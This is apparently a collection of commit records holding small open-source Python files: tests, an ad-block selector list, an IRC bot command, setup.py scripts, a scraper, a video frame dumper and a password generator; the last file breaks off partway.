| mit | Python | |
c022bffe21dce408cd348e69796da4dcc573af23 | Add tests for errors.py | Akrog/gcs-client | tests/test_errors.py | tests/test_errors.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
test_errors
----------------------------------
Tests errors classes.
"""
import unittest
import mock
from gcs_client import errors as gcs_errors
class TestErrors(unittest.TestCase):
def test_init(self):
"""Test init providing all arguments."""
http = gcs_errors.Http(mock.sentinel.message, mock.sentinel.code)
self.assertEqual(mock.sentinel.message, http.message)
self.assertEqual(mock.sentinel.code, http.code)
def test_str(self):
"""Test str conversio."""
message = 'message'
code = 'code'
http = gcs_errors.Http(message, code)
self.assertIn(message, str(http))
self.assertIn(code, str(http))
def test_str_no_message(self):
"""Test str conversio with missing message."""
code = 'code'
http = gcs_errors.Http(code=code)
self.assertIn(code, str(http))
self.assertNotIn(':', str(http))
def test_check_classes(self):
"""Test that error classes are dynamically created."""
for code, (cls_name, cls_parent) in gcs_errors.http_errors.items():
cls = getattr(gcs_errors, cls_name)
self.assertEqual(code, cls.code)
self.assertIn(cls_parent, cls.__bases__)
def test_create_http_exception(self):
"""Test that create_http_exception creates specific exceptions."""
for code, (cls_name, cls_parent) in gcs_errors.http_errors.items():
exc = gcs_errors.create_http_exception(code, mock.sentinel.message)
self.assertEqual(code, exc.code)
self.assertTrue(isinstance(exc, getattr(gcs_errors, cls_name)))
self.assertEqual(mock.sentinel.message, exc.message)
def test_create_http_exception_str_code(self):
"""Test create_http_exception creates exceptions from str codes."""
for code, (cls_name, cls_parent) in gcs_errors.http_errors.items():
exc = gcs_errors.create_http_exception(str(code),
mock.sentinel.message)
self.assertEqual(code, exc.code)
self.assertTrue(isinstance(exc, getattr(gcs_errors, cls_name)))
self.assertEqual(mock.sentinel.message, exc.message)
def test_create_http_exception_non_int_code(self):
"""Test create_http_exception creates exceptions from non int codes."""
for code, (cls_name, cls_parent) in gcs_errors.http_errors.items():
exc = gcs_errors.create_http_exception('code',
mock.sentinel.message)
self.assertEqual('code', exc.code)
self.assertIs(gcs_errors.Http, type(exc))
self.assertEqual(mock.sentinel.message, exc.message)
def test_create_http_exception_non_specific(self):
"""Test create_http_exception creates non specific exceptions."""
exc = gcs_errors.create_http_exception(1, mock.sentinel.message)
self.assertEqual(1, exc.code)
self.assertIs(gcs_errors.Http, type(exc))
self.assertEqual(mock.sentinel.message, exc.message)
| apache-2.0 | Python | |
87172e2b9e0143cf164dc34c26c69fc4eda7dd1e | Add initial block list for ad_block functionality | seleniumbase/SeleniumBase,mdmintz/seleniumspot,mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/seleniumspot,mdmintz/SeleniumBase | seleniumbase/config/ad_block_list.py | seleniumbase/config/ad_block_list.py | """
For use with SeleniumBase ad_block functionality.
Usage:
On the command line:
"pytest SOME_TEST.py --ad_block"
From inside a test:
self.ad_block()
If using the command line version, the ad_block functionality gets
activated after "self.wait_for_ready_state_complete()" is called,
which is always run after page loads, unless changed in "settings.py".
Using ad_block will slow down test runs a little. (Use only if necessary.)
Format: A CSS Selector that's ready for JavaScript's querySelectorAll()
"""
AD_BLOCK_LIST = [
'[aria-label="Ad"]',
'[class^="sponsored-content"]',
'[data-ad-details*="Advertisement"]',
'[data-native_ad*="placement"]',
'[data-provider="dianomi"]',
'[data-type="ad"]',
'[data-track-event-label*="-taboola-"]',
'[href*="doubleclick.net/"]',
'[id*="-ad-"]',
'[id*="_ads_"]',
'[id*="AdFrame"]',
'[id^="ad-"]',
'[id^="outbrain_widget"]',
'[id^="taboola-"]',
'[id="dianomiRightRail"]',
'[src*="smartads."]',
'[src*="ad_nexus"]',
'[src*="/ads/"]',
'[data-dcm-click-tracker*="/adclick."]',
'[data-google-query-id^="C"]',
'div.ad-container',
'div.ad_module',
'div.ad-subnav-container',
'div.ad-wrapper',
'div.data-ad-container',
'div.l-ad',
'div.right-ad',
'div.wx-adWrapper',
'img.img_ad',
'link[href*="/adservice."]',
'script[src*="/adservice."]',
'script[src*="/pagead/"]',
'section.dianomi-ad',
]
| mit | Python | |
c7cdb6750ac3a927fe773f7d86be94d24df937b1 | Add Choice module | Didero/DideRobot | commands/Choice.py | commands/Choice.py | import random
from CommandTemplate import CommandTemplate
class Command(CommandTemplate):
triggers = ['choice', 'choose']
helptext = "Helps you make a choice between options in a comma-separated list"
def execute(self, message):
"""
:type message: IrcMessage.IrcMessage
"""
replytext = None
if message.messagePartsLength == 0:
replytext = "My choice would be to provide me with some choices, preferably separated by commas"
else:
choices = []
if ',' in message.message:
choices = message.message.split(',')
else:
choices = message.messageParts
if len(choices) == 1:
replytext = "Ooh, that's a tough one. I'd go with the first option, seeing as there is only one"
else:
possibleReplies = ["{}", "Hmm, I'd go with {}", "Out of those, {} sounds the least bad", "{}, obviously",
"Let's go with... {}. No wait! No, yeah, that one", "I don't know! *rolls dice* Seems you should go for {}",
"Pick {0}, pick {0}!", "Eh, {} will do", "Why not {}?", "The first one! The last one! {}!"]
#Pick a random reply sentence, and then add in a random choice from the provided list, enclosed in quotes
replytext = random.choice(possibleReplies).format("'" + random.choice(choices).strip() + "'")
message.bot.sendMessage(message.source, replytext) | mit | Python | |
0a4bc484b465b2cfa0d763026a161ab7a92a3abb | Create squreRootBi.py | crazyhottommy/some-unorganized-old-scripts,crazyhottommy/some-unorganized-old-scripts,crazyhottommy/some-unorganized-old-scripts | python_scripts/squreRootBi.py | python_scripts/squreRootBi.py | def squreRootBi(x, epsilon):
'''assume x>=0 and epsilon > 0
Return y s.t y*y is within epsilon of x'''
assert x>= 0, 'x must be non-negative, not' + str(x)
assert epsilon > 0 , 'epsilon must be positive, not' + str(epsilon)
low = 0
high= max (x, 1.0) # incase x is smaller than 1, 0.5**2=0.25
guess=(low+high)/2.0
count=1
while abs(guess **2 -x ) > epsilon and count <= 100:
print 'low:', low, 'high:',high, 'guess:', guess
if guess **2 < x:
low=guess
else:
high=guess
guess=(low+high)/2.0
count+=1
assert count <= 100, 'iteration count exceeded'
print 'Bi method, num.interations:', count, 'Estimate:', guess
return guess
| mit | Python | |
645316b5583a69c834c3f6800007eadf2c6d8fed | test ra package | postatum/ra,brandicted/ra,ramses-tech/ra | tests/test_ra.py | tests/test_ra.py |
def test_api(mocker, test_raml):
import ra
raml = test_raml('simple')
app = mocker.Mock()
api = ra.api(raml, app)
assert isinstance(api, ra.dsl.APISuite)
| apache-2.0 | Python | |
2d4f09fe8c31aa2b996e71565292d5ef249986c7 | Add a small tool to answer questions like "Why does target A depend on target B". | yitian134/chromium,yitian134/chromium,ropik/chromium,ropik/chromium,ropik/chromium,ropik/chromium,gavinp/chromium,yitian134/chromium,gavinp/chromium,adobe/chromium,gavinp/chromium,yitian134/chromium,gavinp/chromium,yitian134/chromium,adobe/chromium,adobe/chromium,gavinp/chromium,ropik/chromium,yitian134/chromium,ropik/chromium,ropik/chromium,adobe/chromium,adobe/chromium,gavinp/chromium,adobe/chromium,yitian134/chromium,gavinp/chromium,ropik/chromium,adobe/chromium,yitian134/chromium,gavinp/chromium,ropik/chromium,adobe/chromium,gavinp/chromium,adobe/chromium,gavinp/chromium,yitian134/chromium,adobe/chromium,adobe/chromium,yitian134/chromium | tools/gyp-explain.py | tools/gyp-explain.py | #!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints paths between gyp targets.
"""
import json
import os
import sys
import time
from collections import deque
def usage():
print """\
Usage:
tools/gyp-explain.py chrome_dll gtest#
"""
def GetPath(graph, fro, to):
"""Given a graph in (node -> list of successor nodes) dictionary format,
yields all paths from |fro| to |to|, starting with the shortest."""
# Storing full paths in the queue is a bit wasteful, but good enough for this.
q = deque([(fro, [])])
while q:
t, path = q.popleft()
if t == to:
yield path + [t]
for d in graph[t]:
q.append((d, path + [t]))
def MatchNode(graph, substring):
"""Given a dictionary, returns the key that matches |substring| best. Exits
if there's not one single best match."""
candidates = []
for target in graph:
if substring in target:
candidates.append(target)
if not candidates:
print 'No targets match "%s"' % substring
sys.exit(1)
if len(candidates) > 1:
print 'More than one target matches "%s": %s' % (
substring, ' '.join(candidates))
sys.exit(1)
return candidates[0]
def Main(argv):
# Check that dump.json exists and that it's not too old.
dump_json_dirty = False
try:
st = os.stat('dump.json')
file_age_s = time.time() - st.st_mtime
if file_age_s > 2 * 60 * 60:
print 'dump.json is more than 2 hours old.'
dump_json_dirty = True
except IOError:
print 'dump.json not found.'
dump_json_dirty = True
if dump_json_dirty:
print 'Run'
print ' GYP_GENERATORS=dump_dependency_json build/gyp_chromium'
print 'first, then try again.'
sys.exit(1)
g = json.load(open('dump.json'))
if len(argv) != 3:
usage()
sys.exit(1)
fro = MatchNode(g, argv[1])
to = MatchNode(g, argv[2])
paths = list(GetPath(g, fro, to))
if len(paths) > 0:
print 'These paths lead from %s to %s:' % (fro, to)
for path in paths:
print ' -> '.join(path)
else:
print 'No paths found from %s to %s.' % (fro, to)
if __name__ == '__main__':
Main(sys.argv)
| bsd-3-clause | Python | |
5e32d890fe0762163f1edab6672df91e7d461d8f | Check if a given sequence of moves for a robot is circular or not (py) | MayankAgarwal/GeeksForGeeks | check-if-a-given-sequence-of-moves-for-a-robot-is-circular-or-not.py | check-if-a-given-sequence-of-moves-for-a-robot-is-circular-or-not.py | from operator import add
import math
moves = raw_input("Enter the moves: ")
start_position = [0,0]
current_position = [0,0]
'''
heading = [1,90] - 1 step North
[1, -90] - 1 step South
[1,0] - East
[1,360] - West
'''
heading = [1,0]
for move in moves:
if move.upper() == "G":
angle = heading[1]
step = heading[0]
move_coord = [ round(step*math.cos(math.radians(angle))), round(step*math.sin(math.radians(angle))) ]
current_position = map(add, current_position, move_coord)
elif move.upper() == "L":
heading = map(add, heading, [0, 90])
elif move.upper() == "R":
heading = map(add, heading, [0, -90])
if start_position == current_position:
print "Given sequence of moves is circular"
else:
print "Given sequence of moves is NOT circular" | apache-2.0 | Python | |
7e1113801b04c7cc7300ee0cdebea25d0ea190a6 | Create scrap.py | alangfiles/graphscraper | scrap.py | scrap.py | import urllib2
import json
from bs4 import BeautifulSoup
base_url = ""
starting_page = ""
json_export = '{ "pages": [ \n'
index = 0
url_list = []
url_list.append(base_url+starting_page)
urls_tested = []
for url in url_list:
page_json = '{ "page" : \n { "url": "' + url + '", '
urls_tested.append(url) #add this url as 'tested'
req = urllib2.Request(url)
site_html = urllib2.urlopen(req).read()
soup = BeautifulSoup(site_html)
# create a list of <a href> links
all_links = soup.findAll("a", href=True)
page_json += '"links": ['
#filter all the links
filtered_links = []
for link in all_links:
if ".action" in link["href"]: # all the .action links
filtered_links.append(link['href'])
if link["href"] not in url_list and base_url+link["href"] not in urls_tested and index < 10: # add to url_list
url_list.append(base_url+link["href"])
index = index + 1
elif "http" in link["href"]: # all the outside links
filtered_links.append(link['href'])
for link in filtered_links:
page_json += '{ "link": "' + link + '"},\n '
page_json += "]}\n},"
json_export += page_json
json_export += ']}'
print json_export
| mit | Python | |
2eec69e94538d16adea4b6c0193a4cb9cd68cfd6 | Add utility to dump pairs of frames from a list of videos | achalddave/frame-pairs,achalddave/frame-pairs | dump_frame_pairs.py | dump_frame_pairs.py | """Dump pairs of frames from videos."""
import argparse
import logging
import random
import sys
import os
from collections import namedtuple
import cv2
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('video_list',
default=None,
help='New-line separated file containing paths to videos.')
parser.add_argument('output',
default=None,
help='Directory to output frames to.')
args = parser.parse_args()
logging.getLogger().setLevel(logging.INFO)
NUM_PAIRS_PER_VIDEO = 5
PAIR_DISTANCE_SECONDS = 3
class VideoOpenFailedException(Exception):
pass
Frame = namedtuple('Frame', ['seconds', 'frame'])
FramePair = namedtuple('FramePair', ['start', 'end'])
def sample_frame_pairs(video_path, num_pairs_per_video, pair_distance_seconds):
video = cv2.VideoCapture(video_path)
if not video.isOpened():
raise VideoOpenFailedException("Couldn't open video {}".format(
video_path))
frame_rate = video.get(cv2.cv.CV_CAP_PROP_FPS)
num_frames = int(video.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
# Sample frame pair indices.
pair_distance_frames = int(pair_distance_seconds * frame_rate)
start_indices = random.sample(
range(num_frames - pair_distance_frames), num_pairs_per_video)
start_indices.sort()
end_indices = [start + pair_distance_frames for start in start_indices]
frames_to_capture = set(start_indices + end_indices)
captured_frames = dict() # Map frame indices to frames.
# Capture required frames.
current_frame_index = 0
while video.isOpened():
return_value, frame = video.read()
if return_value != True:
break
if current_frame_index in frames_to_capture:
captured_frames[current_frame_index] = frame
current_frame_index += 1
# Create FramePair objects.
frame_pairs = []
for start_index, end_index in zip(start_indices, end_indices):
start_seconds = start_index / frame_rate
start_frame = Frame(seconds=start_seconds,
frame=captured_frames[start_index])
end_seconds = end_index / frame_rate
end_frame = Frame(seconds=end_seconds,
frame=captured_frames[end_index])
frame_pairs.append(FramePair(start_frame, end_frame))
return frame_pairs
def main():
videos = []
with open(args.video_list) as f:
videos.extend(f.read().strip().split('\n'))
# Create output directory; exit if it exists and is not empty.
if os.path.isdir(args.output):
if os.listdir(args.output):
logging.fatal(("Output directory '{}' already exists and is "
"not empty.").format(args.output))
sys.exit(1)
else:
os.mkdir(args.output)
for video_path in videos:
try:
logging.info('Reading video {}'.format(video_path))
frame_pairs = sample_frame_pairs(video_path, NUM_PAIRS_PER_VIDEO,
PAIR_DISTANCE_SECONDS)
except VideoOpenFailedException as e:
logging.error(e)
continue
video_basename = os.path.splitext(os.path.basename(video_path))[0]
video_output_dir = '{}/{}'.format(args.output, video_basename)
os.mkdir(video_output_dir)
# Write frame pairs to disk
for i, (start_frame, end_frame) in enumerate(frame_pairs):
pair_output_dir = '{}/pair-{}-{}'.format(video_output_dir,
int(start_frame.seconds),
int(end_frame.seconds))
if os.path.isdir(pair_output_dir): continue
os.mkdir(pair_output_dir)
start_image = '{}/start.png'.format(pair_output_dir)
end_image = '{}/end.png'.format(pair_output_dir)
cv2.imwrite(start_image, start_frame.frame)
cv2.imwrite(end_image, end_frame.frame)
if __name__ == '__main__':
main()
| mit | Python | |
4c7536d6f2c5c8b6f1c76a8fb6af062f3cfebf6c | add setup.py | blcook223/dummy_data | setup.py | setup.py | from setuptools import setup
setup(name='dummy_data',
version='0.0.0',
description='Generate dummy data ',
url='http://github.com/blcook223/dummy_data',
author='Benjamin Cook',
author_email='benjamin.l.cook@gmail.com',
license='MIT',
packages=['dummy_data'],
zip_safe=False)
| mit | Python | |
b253d58d9feb614e00bdff3b41e087eafd0bfc5d | Bump version. | subhaoi/kioskuser,bradleyg/django-ajaximage,subhaoi/kioskuser,subhaoi/kioskuser,bradleyg/django-ajaximage,bradleyg/django-ajaximage | setup.py | setup.py | import os
from setuptools import setup
f = open(os.path.join(os.path.dirname(__file__), 'README.md'))
readme = f.read()
f.close()
setup(
name='django-ajaximage',
version='0.1.17',
description='Add ajax image upload functionality with a progress bar to file input fields within Django admin. Images are optionally resized.',
long_description=readme,
author="Bradley Griffiths",
author_email='bradley.griffiths@gmail.com',
url='https://github.com/bradleyg/django-ajaximage',
packages=['ajaximage'],
include_package_data=True,
install_requires=[
'Django',
'Pillow',
],
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
)
| import os
from setuptools import setup
f = open(os.path.join(os.path.dirname(__file__), 'README.md'))
readme = f.read()
f.close()
setup(
name='django-ajaximage',
version='0.1.16-rohanza',
description='Add ajax image upload functionality with a progress bar to file input fields within Django admin. Images are optionally resized.',
long_description=readme,
author="Bradley Griffiths",
author_email='bradley.griffiths@gmail.com',
url='https://github.com/bradleyg/django-ajaximage',
packages=['ajaximage'],
include_package_data=True,
install_requires=[
'Django',
'Pillow',
],
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
)
| mit | Python |
4f4a30e9d0be7b282be6a5378d67b9d5cad047bc | Add classdata for bayes | kevinwilde/WildeBot,kevinwilde/WildeBot,kevinwilde/WildeBot,kevinwilde/WildeBot | bayes/classdata.py | bayes/classdata.py | # Name: Kevin Wilde (kjw731)
# Date: May 23, 2016
# Description: Sentiment Analysis with Naive Bayes Classifiers
#
# All group members were present and contributing during all work on this
# project. (I worked alone.)
#
# Class to hold class data. Necessary to define in separate module because
# I will be pickling instances of this class
class ClassData:
def __init__(self):
"""Used to keep track of data for each class in training"""
self.num_files = 0
self.feature_dict = {}
self.sum_of_all_features = 0
| mit | Python | |
4e396326c2c053713bc6699ff572cd96669fa041 | Add setup.py | ludios/tagmyrebase,ludios/tagmyrebase | setup.py | setup.py | #!/usr/bin/env python3
from distutils.core import setup
setup(
name="tagmyrebase",
version="2.0.0",
description="Utility to tag HEAD and the upstream commit after a rebase",
scripts=["tagmyrebase"],
)
| mit | Python | |
af07e75b3f13970b16b8e8c8509e4e83a2dbfd18 | Add setup.py | epayet/playlist_kreator,epayet/playlist_kreator | setup.py | setup.py | # Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
from playlist_kreator import VERSION
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
with open('requirements.txt') as requirements_file:
requirements = requirements_file.read().split('\n')
setup(
name='playlist-kreator',
version=VERSION,
description='Create playlists easily from a list of artists, using their top songs.',
long_description=long_description,
url='https://github.com/epayet/playlist_kreator',
author='Emmanuel payet',
author_email='contact@emmanuel-payet.me',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: End Users/Desktop',
'Topic :: Internet',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='music googlemusic playlist',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=requirements,
)
| mit | Python | |
247c57b08f9f7baf8d0fb71ca323ac60005f280f | Initialize setup file for microservice | chrswt/vicarious-microservice | setup.py | setup.py | from setuptools import find_packages, setup
setup(name='pig_latin_microservice',
version='1.0',
description='Vicarious Pig Latin Microservice Project',
author='Christopher Tham',
platforms=['any'],
license='MIT',
packages=find_packages())
| mit | Python | |
5c09bc5cd1611c81c70db7248a45fcbb10c61d71 | add setup.py | robertchase/spindrift,robertchase/spindrift | setup.py | setup.py | from setuptools import find_packages
from distutils.core import setup
setup(
name='spindrift',
version='1.0.0',
packages=find_packages(exclude=['tests']),
description='A rest framework',
long_description="""
Documentation
-------------
You can see the project and documentation at the `GitHub repo <https://github.com/robertchase/spindrift>`_
""",
author='Bob Chase',
url='https://github.com/robertchase/spindrift',
license='MIT',
)
| mit | Python | |
d976725de01d2691c42b796d30c69c42d2934c07 | Update setup.py | blabla1337/skf-flask,akaasjager/skf-flask,dpnl87/skf-flask,dpnl87/skf-flask,blabla1337/skf-flask,blabla1337/skf-flask,akaasjager/skf-flask,dpnl87/skf-flask,blabla1337/skf-flask,akaasjager/skf-flask,blabla1337/skf-flask,akaasjager/skf-flask | setup.py | setup.py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='owasp-skf',
version='1.3.14',
description='The OWASP Security Knowledge Framework',
url='https://github.com/blabla1337/skf-flask',
author='Glenn ten Cate, Riccardo ten Cate',
author_email='gtencate@schubergphilis.com, r.tencate77@gmail.com',
license='AGPLV3',
packages=['skf'],
# trying to add files...
include_package_data = True,
long_description="""\
The Security Knowledge Framework is an fully open-source Python-Flask web-application.
It is an expert system application that uses OWASP Application Security Verification Standard
""",
install_requires=['markdown','BeautifulSoup', 'python-docx','lxml==3.4.2', 'cryptography==0.8.2', 'pyOpenSSL', 'requests', 'importlib','flask-bcrypt'],
dependency_links= [
'https://github.com/mitsuhiko/flask/tarball/master#egg=Flask-owasp'
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Framework :: Flask",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Software Development",
"Topic :: Security",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: Unix",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)",
])
| try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='owasp-skf',
version='1.3.12',
description='The OWASP Security Knowledge Framework',
url='https://github.com/blabla1337/skf-flask',
author='Glenn ten Cate, Riccardo ten Cate',
author_email='gtencate@schubergphilis.com, r.tencate77@gmail.com',
license='AGPLV3',
packages=['skf'],
# trying to add files...
include_package_data = True,
long_description="""\
The Security Knowledge Framework is an fully open-source Python-Flask web-application.
It is an expert system application that uses OWASP Application Security Verification Standard
""",
install_requires=['markdown','BeautifulSoup', 'python-docx','lxml==3.4.2', 'cryptography==0.8.2', 'pyOpenSSL', 'requests', 'importlib','flask-bcrypt'],
dependency_links= [
'https://github.com/mitsuhiko/flask/tarball/master#egg=Flask-owasp'
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Framework :: Flask",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Software Development",
"Topic :: Security",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: Unix",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)",
])
| agpl-3.0 | Python |
85a7279c08b1997b5d2483106a10a0c428d44458 | Add setup.py. | FelixLoether/python-sharer | setup.py | setup.py | from setuptools import setup, Command
import subprocess
class PyTest(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
errno = subprocess.call(['py.test'])
raise SystemExit(errno)
setup(
name='python-sharer',
version='0.1.0',
url='http://github.com/FelixLoether/python-sharer',
author='Oskari Hiltunen',
author_email='python-sharer@loethr.net',
description=(
'Python-Sharer is a utility to help share a message to different '
'social medias.'
),
long_description=open('README.rst').read(),
packages=['sharers'],
platforms='any',
cmdclass={'test': PyTest},
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Internet :: WWW/HTTP',
]
)
| mit | Python | |
a45885947fa10c9143beec5294870e801fff8bc6 | Create apg_de.py | t3sl4/APGTool-gui | apg_de.py | apg_de.py | #!/usr/bin/env python2
#
#
#
# by t3sl4/tesl23
#
import base64
import random
import string
from Crypto.Cipher import AES
decoded = ''
def makepasswd(bsize, key, spass, username, passfor, saveto, pad, dec, low, upp, pun):
if bsize == '32':
bsize = 32
elif bsize == '16':
bsize = 16
elif bsize == '24':
bsize = 24
else:
#TODO handle error
print 'Error 1'
passwd = ''
if int(dec) > 0:
i = 0
while i < int(dec):
passwd += ''.join(random.choice(string.digits))
i += 1
if int(low) > 0:
i = 0
while i < int(low):
passwd += ''.join(random.choice(string.ascii_lowercase))
i += 1
if int(upp) > 0:
i = 0
while i < int(upp):
passwd += ''.join(random.choice(string.ascii_uppercase))
i += 1
if int(pun) > 0:
i = 0
while i < int(pun):
passwd += ''.join(random.choice(string.punctuation))
i += 1
shuffle = list(passwd)
random.shuffle(shuffle)
passwd = ''.join(shuffle)
schar = spass
if schar == 'r':
passwd = passwd
elif schar is 'd':
cnt = 0
passwd = list(passwd)
for d in passwd:
if d in string.digits:
position = cnt
break
cnt += 1
passwd.insert(0, passwd.pop(cnt))
passwd = ''.join(passwd)
elif schar is 'l':
cnt = 0
passwd = list(passwd)
for l in passwd:
if l in string.ascii_lowercase:
position = cnt
break
cnt += 1
passwd.insert(0, passwd.pop(cnt))
passwd = ''.join(passwd)
elif schar is 'u':
cnt = 0
passwd = list(passwd)
for u in passwd:
if u in string.ascii_uppercase:
position = cnt
break
cnt += 1
passwd.insert(0, passwd.pop(cnt))
passwd = ''.join(passwd)
elif schar is 'p':
cnt = 0
passwd = list(passwd)
for p in passwd:
if p in string.punctuation:
position = cnt
break
cnt += 1
passwd.insert(0, passwd.pop(cnt))
passwd = ''.join(passwd)
else:
#TODO handle error
print ''
print 'Wrong choice!'
padd = lambda s: s + (bsize - len(s) % bsize) * pad
encAES = lambda c, s: base64.b64encode(c.encrypt(padd(s)))
cipher = AES.new(key)
encoded = encAES(cipher, passwd)
ofile = open(saveto, 'a')
ofile.write(passfor + '::'+ username + '::' + encoded + '\n')
ofile.close()
def decryptpasswd(dkey, dpad, dpass):
global decoded
decAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(dpad)
cipher = AES.new(dkey)
decoded = decAES(cipher, dpass)
| cc0-1.0 | Python | |
77f6f387d2eda3accc2969a02daf5c8315016d6b | Fix #5: add setup.py for PyPI package | snowblink14/smatch | setup.py | setup.py | #!/usr/bin/env python
import sys
import os
try:
from setuptools import setup, find_packages
except ImportError:
from disutils.core import setup
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "README.md")) as f:
README = f.read()
setup(name="smatch",
version="1.0",
description="Smatch (semantic match) tool",
long_description=README,
author="Shu Cai",
author_email="shucai@isi.edu",
url="https://github.com/snowblink14/smatch",
license="MIT",
py_modules=["smatch", "amr"],
scripts=["smatch.py"],
)
| mit | Python | |
c09aae8181fd7ab706b6fca84e64830e76007687 | add setup.py file | jesford/cluster-lensing | setup.py | setup.py | import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
DESCRIPTION = "Galaxy Cluster Properties and Weak Lensing Profiles"
LONG_DESCRIPTION = """
cluster-lensing: galaxy cluster halo calculations
======================================================
This package includes tools for calculating a variety of galaxy cluster properties, as well as mass-richness and mass-concentration scaling relations, and weak lensing profiles. These include surface mass density (Sigma) and differential surface mass density (DeltaSigma) for NFW halos, both with and without the effects of cluster miscentering.
For more information, visit http://github.com/jesford/cluster-lensing
"""
NAME = "cluster-lensing"
AUTHOR = "Jes Ford"
AUTHOR_EMAIL = "jesford@uw.edu"
MAINTAINER = "Jes Ford"
MAINTAINER_EMAIL = "jesford@uw.edu"
URL = 'http://github.com/jesford/cluster-lensing'
DOWNLOAD_URL = 'http://github.com/jesford/cluster-lensing'
LICENSE = 'MIT'
VERSION = '0.0.1'
setup(name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
url=URL,
download_url=DOWNLOAD_URL,
license=LICENSE,
packages=['cluster-lensing'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 2.7',
)
| mit | Python | |
b89347a6aaec2f5d74f788b966ead5cc8a2ae37e | add setup.py | vpelletier/python-libusb1,vpelletier/python-libusb1 | setup.py | setup.py | from distutils.core import setup
setup(name='python-libusb1',
description='a Python wrapper around libusb-1.0',
version='0.0.1',
author='vpelletier',
url='http://github.com/vpelletier/python-libusb1',
py_modules=['libusb1','usb1'],
)
| lgpl-2.1 | Python | |
e0550aa39f76eb186be41914afb484d135d0257c | Add setup.py | inean/LinkHeader | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='LinkHeader',
version='0.1',
description='The parsing and formatting of Link Headers',
author='Michael Burrows',
author_email='mjb@asplake.co.uk ',
url='http://bitbucket.org/asplake/link_header',
py_modules=['link_header']
classifiers=["Development Status :: TBC",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries :: Python Modules"])
| mit | Python | |
62facc7d99797330fbd03b55a88ba12c60c23ea2 | add setup.py | encorehu/django-home,encorehu/django-home,encorehu/django-home | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='home',
version="0.1",
author='encorehu',
author_email='huyoo353@126.com',
description='a django project specific app.',
url='https://github.com/encorehu/django-home',
packages=find_packages(),
package_dir={'home':'home'},
package_data={'home':['*.*','templates/home/*.*']},
zip_safe = False,
include_package_data=True,
classifiers=[
"Framework :: Django",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Topic :: Software Development"
],
)
| mit | Python | |
56f1a366c8a482c63782933514222376bb827a8a | add setup.py | ldo/dbussy | setup.py | setup.py | #+
# Distutils script to install DBussy. Invoke from the command line
# in this directory as follows:
#
# python3 setup.py build
# sudo python3 setup.py install
#
# Written by Lawrence D'Oliveiro <ldo@geek-central.gen.nz>.
#-
import distutils.core
distutils.core.setup \
(
name = "DBussy",
version = "0.5",
description = "language bindings for libdbus, for Python 3.5 or later",
author = "Lawrence D'Oliveiro",
author_email = "ldo@geek-central.gen.nz",
